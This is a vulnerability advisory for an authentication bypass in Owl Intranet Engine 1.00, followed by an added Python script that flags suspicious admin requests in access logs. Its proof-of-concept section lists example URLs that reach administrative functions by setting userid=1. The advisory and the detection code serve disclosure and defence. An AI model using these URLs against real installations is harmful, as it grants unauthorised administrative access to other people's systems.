Owl Intranet Engine 'userid' Parameter Authentication Bypass Vulnerability
BID:51076
Info
| Bugtraq ID: | 51076 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 15 2011 12:00AM |
| Updated: | Dec 15 2011 12:00AM |
| Credit: | RedTeam Pentesting GmbH |
| Vulnerable: | Owl Intranet Engine Owl Intranet Engine 1.00 |
| Not Vulnerable: | Owl Intranet Engine Owl Intranet Engine 1.01 |
Discussion
Owl Intranet Engine is prone to an authentication-bypass vulnerability.
An attacker can exploit this issue to bypass the authentication process and gain administrative access to the application.
Owl Intranet Engine 1.00 is affected; other versions may also be vulnerable.
Exploit / POC
An attacker can use readily available tools to exploit this issue.
The following example URIs are available:
http://www.example.org/owl/admin/index.php?userid=1
http://www.example.org/owl/admin/index.php?userid=1&newuser
http://www.example.org/owl/admin/index.php?userid=1&action=edituser&owluser=1
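Requests of this shape can be found in web server access logs. The following is an added example, not part of the original advisory or of Owl's own code: it assumes Apache/nginx combined log format, runs over constructed sample lines, and flags every request to the admin script that carries a `userid` query parameter so it can be reviewed.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed log layout: Apache/nginx "combined" format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
ADMIN_SUFFIX = "/admin/index.php"  # script named in the advisory's example URIs

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Dec/2011:10:01:02 +0000] '
    '"GET /owl/admin/index.php?userid=1 HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.7 - - [15/Dec/2011:10:01:09 +0000] '
    '"GET /owl/admin//index.php?userid=1&action=edituser&owluser=1 HTTP/1.1" 200 4096 "-" "-"',
    '198.51.100.4 - - [15/Dec/2011:10:02:00 +0000] '
    '"GET /owl/index.php HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.4 - - [15/Dec/2011:10:02:30 +0000] '
    '"GET /owl/admin/index.php HTTP/1.1" 302 0 "-" "-"',
]


def find_userid_admin_requests(lines):
    """Return one record per request to the admin script that carries 'userid'."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        parts = urlsplit(m["target"])
        # Decode and normalise the path so /admin//index.php still matches.
        path = posixpath.normpath(unquote(parts.path))
        if not path.endswith(ADMIN_SUFFIX):
            continue
        # parse_qsl percent-decodes names; keep valueless flags such as 'newuser'.
        params = dict(parse_qsl(parts.query, keep_blank_values=True))
        if "userid" in params:
            hits.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                         "path": path, "userid": params["userid"],
                         "other_params": sorted(k for k in params if k != "userid")})
    return hits


if __name__ == "__main__":
    for hit in find_userid_admin_requests(SAMPLE_LOG):
        print(hit)
```

Access logs record only the request line, so parameters sent in a POST body are not covered by this check.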
Solution / Fix
Solution:
Reportedly, the vendor has fixed the issue but Symantec has not confirmed it. Please contact the vendor for more information.
References
References:
- Owl Intranet Engine Homepage (Owl Intranet Engine)
- Owl Intranet Engine: Authentication Bypass (Owl Intranet Engine)